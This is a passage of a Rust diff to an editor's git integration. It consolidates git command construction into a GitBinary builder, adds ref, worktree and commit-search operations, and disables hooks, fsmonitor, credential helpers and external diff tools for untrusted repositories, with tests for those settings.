&working_directory?, - &path, - &content, - line_ending, - ) - .await + crate::blame::Blame::for_path(&git?, &path, &content, line_ending).await }) .boxed() } @@ -1921,11 +1856,10 @@ impl GitRepository for RealGitRepository { skip: usize, limit: Option, ) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; + let git = git_binary?; // Use a unique delimiter with a hardcoded UUID to separate commits // This essentially eliminates any chance of encountering the delimiter in actual commit data let commit_delimiter = @@ -1936,7 +1870,7 @@ impl GitRepository for RealGitRepository { commit_delimiter ); - let mut args = vec!["--no-optional-locks", "log", "--follow", &format_string]; + let mut args = vec!["log", "--follow", &format_string]; let skip_str; let limit_str; @@ -1953,9 +1887,8 @@ impl GitRepository for RealGitRepository { args.push("--"); - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(&args) + let output = git + .build_command(&args) .arg(path.as_unix_str()) .output() .await?; @@ -2000,30 +1933,17 @@ impl GitRepository for RealGitRepository { } fn diff(&self, diff: DiffType) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; + let git = git_binary?; let output = match diff { DiffType::HeadToIndex => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["diff", "--staged"]) - .output() - .await? - } - DiffType::HeadToWorktree => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["diff"]) - .output() - .await? + git.build_command(&["diff", "--staged"]).output().await? } + DiffType::HeadToWorktree => git.build_command(&["diff"]).output().await?, DiffType::MergeBase { base_ref } => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["diff", "--merge-base", base_ref.as_ref()]) + git.build_command(&["diff", "--merge-base", base_ref.as_ref()]) .output() .await? } @@ -2041,51 +1961,30 @@ impl GitRepository for RealGitRepository { fn diff_stat( &self, - diff: DiffType, - ) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + path_prefixes: &[RepoPath], + ) -> BoxFuture<'_, Result> { + let path_prefixes = path_prefixes.to_vec(); + let git_binary = self.git_binary(); + self.executor .spawn(async move { - let working_directory = working_directory?; - let output = match diff { - DiffType::HeadToIndex => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["diff", "--numstat", "--staged"]) - .output() - .await? - } - DiffType::HeadToWorktree => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["diff", "--numstat"]) - .output() - .await? - } - DiffType::MergeBase { base_ref } => { - new_command(&git_binary_path) - .current_dir(&working_directory) - .args([ - "diff", - "--numstat", - "--merge-base", - base_ref.as_ref(), - "HEAD", - ]) - .output() - .await? - } - }; - - anyhow::ensure!( - output.status.success(), - "Failed to run git diff --numstat:\n{}", - String::from_utf8_lossy(&output.stderr) - ); - Ok(crate::status::parse_numstat(&String::from_utf8_lossy( - &output.stdout, - ))) + let git_binary = git_binary?; + let mut args: Vec = vec![ + "diff".into(), + "--numstat".into(), + "--no-renames".into(), + "HEAD".into(), + ]; + if !path_prefixes.is_empty() { + args.push("--".into()); + args.extend( + path_prefixes + .iter() + .map(|p| p.as_std_path().to_string_lossy().into_owned()), + ); + } + let output = git_binary.run(&args).await?; + Ok(crate::status::parse_numstat(&output)) }) .boxed() } @@ -2095,15 +1994,14 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { if !paths.is_empty() { - let output = new_command(&git_binary_path) - .current_dir(&working_directory?) + let git = git_binary?; + let output = git + .build_command(&["update-index", "--add", "--remove", "--"]) .envs(env.iter()) - .args(["update-index", "--add", "--remove", "--"]) .args(paths.iter().map(|p| p.as_unix_str())) .output() .await?; @@ -2123,16 +2021,15 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { if !paths.is_empty() { - let output = new_command(&git_binary_path) - .current_dir(&working_directory?) + let git = git_binary?; + let output = git + .build_command(&["reset", "--quiet", "--"]) .envs(env.iter()) - .args(["reset", "--quiet", "--"]) .args(paths.iter().map(|p| p.as_std_path())) .output() .await?; @@ -2153,19 +2050,16 @@ impl GitRepository for RealGitRepository { paths: Vec, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let mut cmd = new_command(&git_binary_path); - cmd.current_dir(&working_directory?) + let git = git_binary?; + let output = git + .build_command(&["stash", "push", "--quiet", "--include-untracked"]) .envs(env.iter()) - .args(["stash", "push", "--quiet"]) - .arg("--include-untracked"); - - cmd.args(paths.iter().map(|p| p.as_unix_str())); - - let output = cmd.output().await?; + .args(paths.iter().map(|p| p.as_unix_str())) + .output() + .await?; anyhow::ensure!( output.status.success(), @@ -2182,20 +2076,15 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let mut cmd = new_command(git_binary_path); + let git = git_binary?; let mut args = vec!["stash".to_string(), "pop".to_string()]; if let Some(index) = index { args.push(format!("stash@{{{}}}", index)); } - cmd.current_dir(&working_directory?) - .envs(env.iter()) - .args(args); - - let output = cmd.output().await?; + let output = git.build_command(&args).envs(env.iter()).output().await?; anyhow::ensure!( output.status.success(), @@ -2212,20 +2101,15 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let mut cmd = new_command(git_binary_path); + let git = git_binary?; let mut args = vec!["stash".to_string(), "apply".to_string()]; if let Some(index) = index { args.push(format!("stash@{{{}}}", index)); } - cmd.current_dir(&working_directory?) - .envs(env.iter()) - .args(args); - - let output = cmd.output().await?; + let output = git.build_command(&args).envs(env.iter()).output().await?; anyhow::ensure!( output.status.success(), @@ -2242,20 +2126,15 @@ impl GitRepository for RealGitRepository { index: Option, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let mut cmd = new_command(git_binary_path); + let git = git_binary?; let mut args = vec!["stash".to_string(), "drop".to_string()]; if let Some(index) = index { args.push(format!("stash@{{{}}}", index)); } - cmd.current_dir(&working_directory?) - .envs(env.iter()) - .args(args); - - let output = cmd.output().await?; + let output = git.build_command(&args).envs(env.iter()).output().await?; anyhow::ensure!( output.status.success(), @@ -2275,16 +2154,14 @@ impl GitRepository for RealGitRepository { ask_pass: AskPassDelegate, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); let executor = self.executor.clone(); // Note: Do not spawn this command on the background thread, it might pop open the credential helper // which we want to block on. async move { - let mut cmd = new_command(git_binary_path); - cmd.current_dir(&working_directory?) - .envs(env.iter()) - .args(["commit", "--quiet", "-m"]) + let git = git_binary?; + let mut cmd = git.build_command(&["commit", "--quiet", "-m"]); + cmd.envs(env.iter()) .arg(&message.to_string()) .arg("--cleanup=strip") .arg("--no-verify") @@ -2299,6 +2176,10 @@ impl GitRepository for RealGitRepository { cmd.arg("--signoff"); } + if options.allow_empty { + cmd.arg("--allow-empty"); + } + if let Some((name, email)) = name_and_email { cmd.arg("--author").arg(&format!("{name} <{email}>")); } @@ -2310,6 +2191,39 @@ impl GitRepository for RealGitRepository { .boxed() } + fn update_ref(&self, ref_name: String, commit: String) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); + self.executor + .spawn(async move { + let args: Vec = vec!["update-ref".into(), ref_name.into(), commit.into()]; + git_binary?.run(&args).await?; + Ok(()) + }) + .boxed() + } + + fn delete_ref(&self, ref_name: String) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); + self.executor + .spawn(async move { + let args: Vec = vec!["update-ref".into(), "-d".into(), ref_name.into()]; + git_binary?.run(&args).await?; + Ok(()) + }) + .boxed() + } + + fn repair_worktrees(&self) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); + self.executor + .spawn(async move { + let args: Vec = vec!["worktree".into(), "repair".into()]; + git_binary?.run(&args).await?; + Ok(()) + }) + .boxed() + } + fn push( &self, branch_name: String, @@ -2321,18 +2235,25 @@ impl GitRepository for RealGitRepository { cx: AsyncApp, ) -> BoxFuture<'_, Result> { let working_directory = self.working_directory(); + let git_directory = self.path(); let executor = cx.background_executor().clone(); let git_binary_path = self.system_git_binary_path.clone(); + let is_trusted = self.is_trusted(); // Note: Do not spawn this command on the background thread, it might pop open the credential helper // which we want to block on. async move { let git_binary_path = git_binary_path.context("git not found on $PATH, can't push")?; let working_directory = working_directory?; - let mut command = new_command(git_binary_path); + let git = GitBinary::new( + git_binary_path, + working_directory, + git_directory, + executor.clone(), + is_trusted, + ); + let mut command = git.build_command(&["push"]); command .envs(env.iter()) - .current_dir(&working_directory) - .args(["push"]) .args(options.map(|option| match option { PushOptions::SetUpstream => "--set-upstream", PushOptions::Force => "--force-with-lease", @@ -2358,17 +2279,24 @@ impl GitRepository for RealGitRepository { cx: AsyncApp, ) -> BoxFuture<'_, Result> { let working_directory = self.working_directory(); + let git_directory = self.path(); let executor = cx.background_executor().clone(); let git_binary_path = self.system_git_binary_path.clone(); + let is_trusted = self.is_trusted(); // Note: Do not spawn this command on the background thread, it might pop open the credential helper // which we want to block on. async move { let git_binary_path = git_binary_path.context("git not found on $PATH, can't pull")?; - let mut command = new_command(git_binary_path); - command - .envs(env.iter()) - .current_dir(&working_directory?) - .arg("pull"); + let working_directory = working_directory?; + let git = GitBinary::new( + git_binary_path, + working_directory, + git_directory, + executor.clone(), + is_trusted, + ); + let mut command = git.build_command(&["pull"]); + command.envs(env.iter()); if rebase { command.arg("--rebase"); @@ -2393,18 +2321,26 @@ impl GitRepository for RealGitRepository { cx: AsyncApp, ) -> BoxFuture<'_, Result> { let working_directory = self.working_directory(); + let git_directory = self.path(); let remote_name = format!("{}", fetch_options); let git_binary_path = self.system_git_binary_path.clone(); let executor = cx.background_executor().clone(); + let is_trusted = self.is_trusted(); // Note: Do not spawn this command on the background thread, it might pop open the credential helper // which we want to block on. async move { let git_binary_path = git_binary_path.context("git not found on $PATH, can't fetch")?; - let mut command = new_command(git_binary_path); + let working_directory = working_directory?; + let git = GitBinary::new( + git_binary_path, + working_directory, + git_directory, + executor.clone(), + is_trusted, + ); + let mut command = git.build_command(&["fetch", &remote_name]); command .envs(env.iter()) - .current_dir(&working_directory?) - .args(["fetch", &remote_name]) .stdout(Stdio::piped()) .stderr(Stdio::piped()); @@ -2414,14 +2350,12 @@ impl GitRepository for RealGitRepository { } fn get_push_remote(&self, branch: String) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["rev-parse", "--abbrev-ref"]) + let git = git_binary?; + let output = git + .build_command(&["rev-parse", "--abbrev-ref"]) .arg(format!("{branch}@{{push}}")) .output() .await?; @@ -2441,14 +2375,12 @@ impl GitRepository for RealGitRepository { } fn get_branch_remote(&self, branch: String) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["config", "--get"]) + let git = git_binary?; + let output = git + .build_command(&["config", "--get"]) .arg(format!("branch.{branch}.remote")) .output() .await?; @@ -2465,16 +2397,11 @@ impl GitRepository for RealGitRepository { } fn get_all_remotes(&self) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(["remote", "-v"]) - .output() - .await?; + let git = git_binary?; + let output = git.build_command(&["remote", "-v"]).output().await?; anyhow::ensure!( output.status.success(), @@ -2523,17 +2450,12 @@ impl GitRepository for RealGitRepository { } fn check_for_pushed_commit(&self) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; + let git = git_binary?; let git_cmd = async |args: &[&str]| -> Result { - let output = new_command(&git_binary_path) - .current_dir(&working_directory) - .args(args) - .output() - .await?; + let output = git.build_command(args).output().await?; anyhow::ensure!( output.status.success(), String::from_utf8_lossy(&output.stderr).to_string() @@ -2582,14 +2504,10 @@ impl GitRepository for RealGitRepository { } fn checkpoint(&self) -> BoxFuture<'static, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let mut git = GitBinary::new(git_binary_path, working_directory.clone(), executor) - .envs(checkpoint_author_envs()); + let mut git = git_binary?.envs(checkpoint_author_envs()); git.with_temp_index(async |git| { let head_sha = git.run(&["rev-parse", "HEAD"]).await.ok(); let mut excludes = exclude_files(git).await?; @@ -2615,15 +2533,10 @@ impl GitRepository for RealGitRepository { } fn restore_checkpoint(&self, checkpoint: GitRepositoryCheckpoint) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = git_binary?; git.run(&[ "restore", "--source", @@ -2654,14 +2567,10 @@ impl GitRepository for RealGitRepository { left: GitRepositoryCheckpoint, right: GitRepositoryCheckpoint, ) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = git_binary?; let result = git .run(&[ "diff-tree", @@ -2692,14 +2601,10 @@ impl GitRepository for RealGitRepository { base_checkpoint: GitRepositoryCheckpoint, target_checkpoint: GitRepositoryCheckpoint, ) -> BoxFuture<'_, Result> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = git_binary?; git.run(&[ "diff", "--find-renames", @@ -2716,14 +2621,10 @@ impl GitRepository for RealGitRepository { &self, include_remote_name: bool, ) -> BoxFuture<'_, Result>> { - let working_directory = self.working_directory(); - let git_binary_path = self.any_git_binary_path.clone(); - - let executor = self.executor.clone(); + let git_binary = self.git_binary(); self.executor .spawn(async move { - let working_directory = working_directory?; - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = git_binary?; let strip_prefix = if include_remote_name { "refs/remotes/" @@ -2773,22 +2674,23 @@ impl GitRepository for RealGitRepository { hook: RunHook, env: Arc>, ) -> BoxFuture<'_, Result<()>> { - let working_directory = self.working_directory(); + let git_binary = self.git_binary(); let repository = self.repository.clone(); - let git_binary_path = self.any_git_binary_path.clone(); - let executor = self.executor.clone(); let help_output = self.any_git_binary_help_output(); // Note: Do not spawn these commands on the background thread, as this causes some git hooks to hang. async move { - let working_directory = working_directory?; + let git_binary = git_binary?; + + let working_directory = git_binary.working_directory.clone(); if !help_output .await .lines() .any(|line| line.trim().starts_with("hook ")) { let hook_abs_path = repository.lock().path().join("hooks").join(hook.as_str()); - if hook_abs_path.is_file() { + if hook_abs_path.is_file() && git_binary.is_trusted { + #[allow(clippy::disallowed_methods)] let output = new_command(&hook_abs_path) .envs(env.iter()) .current_dir(&working_directory) @@ -2808,10 +2710,12 @@ impl GitRepository for RealGitRepository { return Ok(()); } - let git = GitBinary::new(git_binary_path, working_directory, executor) - .envs(HashMap::clone(&env)); - git.run(&["hook", "run", "--ignore-missing", hook.as_str()]) - .await?; + if git_binary.is_trusted { + let git_binary = git_binary.envs(HashMap::clone(&env)); + git_binary + .run(&["hook", "run", "--ignore-missing", hook.as_str()]) + .await?; + } Ok(()) } .boxed() @@ -2823,13 +2727,10 @@ impl GitRepository for RealGitRepository { log_order: LogOrder, request_tx: Sender>>, ) -> BoxFuture<'_, Result<()>> { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self.working_directory(); - let executor = self.executor.clone(); + let git_binary = self.git_binary(); async move { - let working_directory = working_directory?; - let git = GitBinary::new(git_binary_path, working_directory, executor); + let git = git_binary?; // todo!: should we include no optional locks here? let mut git_log_command = vec![ @@ -2843,7 +2744,7 @@ impl GitRepository for RealGitRepository { git_log_command.extend(["--", file_path.as_unix_str()]); } - let mut command = git.build_command(git_log_command); + let mut command = git.build_command(&git_log_command); command.stdout(Stdio::piped()); command.stderr(Stdio::piped()); @@ -2903,40 +2804,94 @@ impl GitRepository for RealGitRepository { .boxed() } - fn commit_data_reader(&self) -> Result { - let git_binary_path = self.any_git_binary_path.clone(); - let working_directory = self - .working_directory() - .map_err(|_| anyhow!("no working directory"))?; - let executor = self.executor.clone(); + fn search_commits( + &self, + log_source: LogSource, + search_args: SearchCommitArgs, + request_tx: Sender, + ) -> BoxFuture<'_, Result<()>> { + let git_binary = self.git_binary(); - let (request_tx, request_rx) = smol::channel::bounded::(64); + async move { + let git = git_binary?; - let task = self.executor.spawn(async move { - if let Err(error) = - run_commit_data_reader(git_binary_path, working_directory, executor, request_rx) - .await - { - log::error!("commit data reader failed: {error:?}"); + let mut args = vec!["log", SEARCH_COMMIT_FORMAT, log_source.get_arg()?]; + + args.push("--fixed-strings"); + + if !search_args.case_sensitive { + args.push("--regexp-ignore-case"); } - }); - Ok(CommitDataReader { - request_tx, - _task: task, - }) - } -} + args.push("--grep"); + args.push(search_args.query.as_str()); -async fn run_commit_data_reader( - git_binary_path: PathBuf, - working_directory: PathBuf, - executor: BackgroundExecutor, + let mut command = git.build_command(&args); + command.stdout(Stdio::piped()); + command.stderr(Stdio::null()); + + let mut child = command.spawn()?; + let stdout = child.stdout.take().context("failed to get stdout")?; + let mut reader = BufReader::new(stdout); + + let mut line_buffer = String::new(); + + loop { + line_buffer.clear(); + let bytes_read = reader.read_line(&mut line_buffer).await?; + + if bytes_read == 0 { + break; + } + + let sha = line_buffer.trim_end_matches('\n'); + + if let Ok(oid) = Oid::from_str(sha) + && request_tx.send(oid).await.is_err() + { + break; + } + } + + child.status().await?; + Ok(()) + } + .boxed() + } + + fn commit_data_reader(&self) -> Result { + let git_binary = self.git_binary()?; + + let (request_tx, request_rx) = smol::channel::bounded::(64); + + let task = self.executor.spawn(async move { + if let Err(error) = run_commit_data_reader(git_binary, request_rx).await { + log::error!("commit data reader failed: {error:?}"); + } + }); + + Ok(CommitDataReader { + request_tx, + _task: task, + }) + } + + fn set_trusted(&self, trusted: bool) { + self.is_trusted + .store(trusted, std::sync::atomic::Ordering::Release); + } + + fn is_trusted(&self) -> bool { + self.is_trusted.load(std::sync::atomic::Ordering::Acquire) + } +} + +async fn run_commit_data_reader( + git: GitBinary, request_rx: smol::channel::Receiver, ) -> Result<()> { - let git = GitBinary::new(git_binary_path, working_directory, executor); let mut process = git - .build_command(["--no-optional-locks", "cat-file", "--batch"]) + .build_command(&["cat-file", "--batch"]) .stdin(Stdio::piped()) .stdout(Stdio::piped()) .stderr(Stdio::piped()) @@ -3050,18 +3005,12 @@ fn parse_initial_graph_output<'a>( fn git_status_args(path_prefixes: &[RepoPath]) -> Vec { let mut args = vec![ - OsString::from("--no-optional-locks"), OsString::from("status"), OsString::from("--porcelain=v1"), OsString::from("--untracked-files=all"), OsString::from("--no-renames"), OsString::from("-z"), ]; - args.extend( - path_prefixes - .iter() - .map(|path_prefix| path_prefix.as_std_path().into()), - ); args.extend(path_prefixes.iter().map(|path_prefix| { if path_prefix.is_empty() { Path::new(".").into() @@ -3110,26 +3059,32 @@ async fn exclude_files(git: &GitBinary) -> Result { Ok(excludes) } -struct GitBinary { +pub(crate) struct GitBinary { git_binary_path: PathBuf, working_directory: PathBuf, + git_directory: PathBuf, executor: BackgroundExecutor, index_file_path: Option, envs: HashMap, + is_trusted: bool, } impl GitBinary { - fn new( + pub(crate) fn new( git_binary_path: PathBuf, working_directory: PathBuf, + git_directory: PathBuf, executor: BackgroundExecutor, + is_trusted: bool, ) -> Self { Self { git_binary_path, working_directory, + git_directory, executor, index_file_path: None, envs: HashMap::default(), + is_trusted, } } @@ -3171,12 +3126,9 @@ impl GitBinary { // Copy the default index file so that Git doesn't have to rebuild the // whole index from scratch. This might fail if this is an empty repository. - smol::fs::copy( - self.working_directory.join(".git").join("index"), - &index_file_path, - ) - .await - .ok(); + smol::fs::copy(self.git_directory.join("index"), &index_file_path) + .await + .ok(); self.index_file_path = Some(index_file_path.clone()); let result = f(self).await; @@ -3190,22 +3142,16 @@ impl GitBinary { } pub async fn with_exclude_overrides(&self) -> Result { - let path = self - .working_directory - .join(".git") - .join("info") - .join("exclude"); + let path = self.git_directory.join("info").join("exclude"); GitExcludeOverride::new(path).await } fn path_for_index_id(&self, id: Uuid) -> PathBuf { - self.working_directory - .join(".git") - .join(format!("index-{}.tmp", id)) + self.git_directory.join(format!("index-{}.tmp", id)) } - pub async fn run(&self, args: impl IntoIterator) -> Result + pub async fn run(&self, args: &[S]) -> Result where S: AsRef, { @@ -3217,7 +3163,7 @@ impl GitBinary { } /// Returns the result of the command without trimming the trailing newline. - pub async fn run_raw(&self, args: impl IntoIterator) -> Result + pub async fn run_raw(&self, args: &[S]) -> Result where S: AsRef, { @@ -3234,13 +3180,33 @@ impl GitBinary { Ok(String::from_utf8(output.stdout)?) } - fn build_command(&self, args: impl IntoIterator) -> util::command::Command + #[allow(clippy::disallowed_methods)] + pub(crate) fn build_command(&self, args: &[S]) -> util::command::Command where S: AsRef, { let mut command = new_command(&self.git_binary_path); command.current_dir(&self.working_directory); + command.args(["-c", "core.fsmonitor=false"]); + command.arg("--no-optional-locks"); + command.arg("--no-pager"); + + if !self.is_trusted { + command.args(["-c", "core.hooksPath=/dev/null"]); + command.args(["-c", "core.sshCommand=ssh"]); + command.args(["-c", "credential.helper="]); + command.args(["-c", "protocol.ext.allow=never"]); + command.args(["-c", "diff.external="]); + } command.args(args); + + // If the `diff` command is being used, we'll want to add the + // `--no-ext-diff` flag when working on an untrusted repository, + // preventing any external diff programs from being invoked. + if !self.is_trusted && args.iter().any(|arg| arg.as_ref() == "diff") { + command.arg("--no-ext-diff"); + } + if let Some(index_file_path) = self.index_file_path.as_ref() { command.env("GIT_INDEX_FILE", index_file_path); } @@ -3489,6 +3455,8 @@ fn checkpoint_author_envs() -> HashMap { #[cfg(test)] mod tests { + use std::fs; + use super::*; use gpui::TestAppContext; @@ -3499,6 +3467,128 @@ mod tests { } } + #[gpui::test] + async fn test_build_command_untrusted_includes_both_safety_args(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + let dir = tempfile::tempdir().unwrap(); + let git = GitBinary::new( + PathBuf::from("git"), + dir.path().to_path_buf(), + dir.path().join(".git"), + cx.executor(), + false, + ); + let output = git + .build_command(&["version"]) + .output() + .await + .expect("git version should succeed"); + assert!(output.status.success()); + + let git = GitBinary::new( + PathBuf::from("git"), + dir.path().to_path_buf(), + dir.path().join(".git"), + cx.executor(), + false, + ); + let output = git + .build_command(&["config", "--get", "core.fsmonitor"]) + .output() + .await + .expect("git config should run"); + let stdout = String::from_utf8_lossy(&output.stdout); + assert_eq!( + stdout.trim(), + "false", + "fsmonitor should be disabled for untrusted repos" + ); + + git2::Repository::init(dir.path()).unwrap(); + let git = GitBinary::new( + PathBuf::from("git"), + dir.path().to_path_buf(), + dir.path().join(".git"), + cx.executor(), + false, + ); + let output = git + .build_command(&["config", "--get", "core.hooksPath"]) + .output() + .await + .expect("git config should run"); + let stdout = String::from_utf8_lossy(&output.stdout); + assert_eq!( + stdout.trim(), + "/dev/null", + "hooksPath should be /dev/null for untrusted repos" + ); + } + + #[gpui::test] + async fn test_build_command_trusted_only_disables_fsmonitor(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + let dir = tempfile::tempdir().unwrap(); + git2::Repository::init(dir.path()).unwrap(); + + let git = GitBinary::new( + PathBuf::from("git"), + dir.path().to_path_buf(), + dir.path().join(".git"), + cx.executor(), + true, + ); + let output = git + .build_command(&["config", "--get", "core.fsmonitor"]) + .output() + .await + .expect("git config should run"); + let stdout = String::from_utf8_lossy(&output.stdout); + assert_eq!( + stdout.trim(), + "false", + "fsmonitor should be disabled even for trusted repos" + ); + + let git = GitBinary::new( + PathBuf::from("git"), + dir.path().to_path_buf(), + dir.path().join(".git"), + cx.executor(), + true, + ); + let output = git + .build_command(&["config", "--get", "core.hooksPath"]) + .output() + .await + .expect("git config should run"); + assert!( + !output.status.success(), + "hooksPath should NOT be overridden for trusted repos" + ); + } + + #[gpui::test] + async fn test_path_for_index_id_uses_real_git_directory(cx: &mut TestAppContext) { + cx.executor().allow_parking(); + let working_directory = PathBuf::from("/code/worktree"); + let git_directory = PathBuf::from("/code/repo/.git/modules/worktree"); + let git = GitBinary::new( + PathBuf::from("git"), + working_directory, + git_directory.clone(), + cx.executor(), + false, + ); + + let path = git.path_for_index_id(Uuid::nil()); + + assert_eq!( + path, + git_directory.join(format!("index-{}.tmp", Uuid::nil())) + ); + } + #[gpui::test] async fn test_checkpoint_basic(cx: &mut TestAppContext) { disable_git_global_config(); @@ -3858,7 +3948,8 @@ mod tests { assert_eq!(result.len(), 1); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123def"); - assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main"); + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); // Multiple worktrees let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ @@ -3866,23 +3957,36 @@ mod tests { let result = parse_worktrees_from_str(input); assert_eq!(result.len(), 2); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); - assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main"); + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); assert_eq!(result[1].path, PathBuf::from("/home/user/project-wt")); - assert_eq!(result[1].ref_name.as_ref(), "refs/heads/feature"); + assert_eq!(result[1].ref_name, Some("refs/heads/feature".into())); + assert!(!result[1].is_main); - // Detached HEAD entry (should be skipped since ref_name won't parse) + // Detached HEAD entry (included with ref_name: None) let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ worktree /home/user/detached\nHEAD def456\ndetached\n\n"; let result = parse_worktrees_from_str(input); - assert_eq!(result.len(), 1); + assert_eq!(result.len(), 2); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); - - // Bare repo entry (should be skipped) + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); + assert_eq!(result[1].path, PathBuf::from("/home/user/detached")); + assert_eq!(result[1].ref_name, None); + assert_eq!(result[1].sha.as_ref(), "def456"); + assert!(!result[1].is_main); + + // Bare repo entry (included with ref_name: None) let input = "worktree /home/user/bare.git\nHEAD abc123\nbare\n\n\ worktree /home/user/project\nHEAD def456\nbranch refs/heads/main\n\n"; let result = parse_worktrees_from_str(input); - assert_eq!(result.len(), 1); - assert_eq!(result[0].path, PathBuf::from("/home/user/project")); + assert_eq!(result.len(), 2); + assert_eq!(result[0].path, PathBuf::from("/home/user/bare.git")); + assert_eq!(result[0].ref_name, None); + assert!(result[0].is_main); + assert_eq!(result[1].path, PathBuf::from("/home/user/project")); + assert_eq!(result[1].ref_name, Some("refs/heads/main".into())); + assert!(!result[1].is_main); // Extra porcelain lines (locked, prunable) should be ignored let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\ @@ -3891,11 +3995,17 @@ mod tests { let result = parse_worktrees_from_str(input); assert_eq!(result.len(), 3); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); - assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main"); + assert_eq!(result[0].ref_name, Some("refs/heads/main".into())); + assert!(result[0].is_main); assert_eq!(result[1].path, PathBuf::from("/home/user/locked-wt")); - assert_eq!(result[1].ref_name.as_ref(), "refs/heads/locked-branch"); + assert_eq!(result[1].ref_name, Some("refs/heads/locked-branch".into())); + assert!(!result[1].is_main); assert_eq!(result[2].path, PathBuf::from("/home/user/prunable-wt")); - assert_eq!(result[2].ref_name.as_ref(), "refs/heads/prunable-branch"); + assert_eq!( + result[2].ref_name, + Some("refs/heads/prunable-branch".into()) + ); + assert!(!result[2].is_main); // Leading/trailing whitespace on lines should be tolerated let input = @@ -3904,7 +4014,8 @@ mod tests { assert_eq!(result.len(), 1); assert_eq!(result[0].path, PathBuf::from("/home/user/project")); assert_eq!(result[0].sha.as_ref(), "abc123"); - 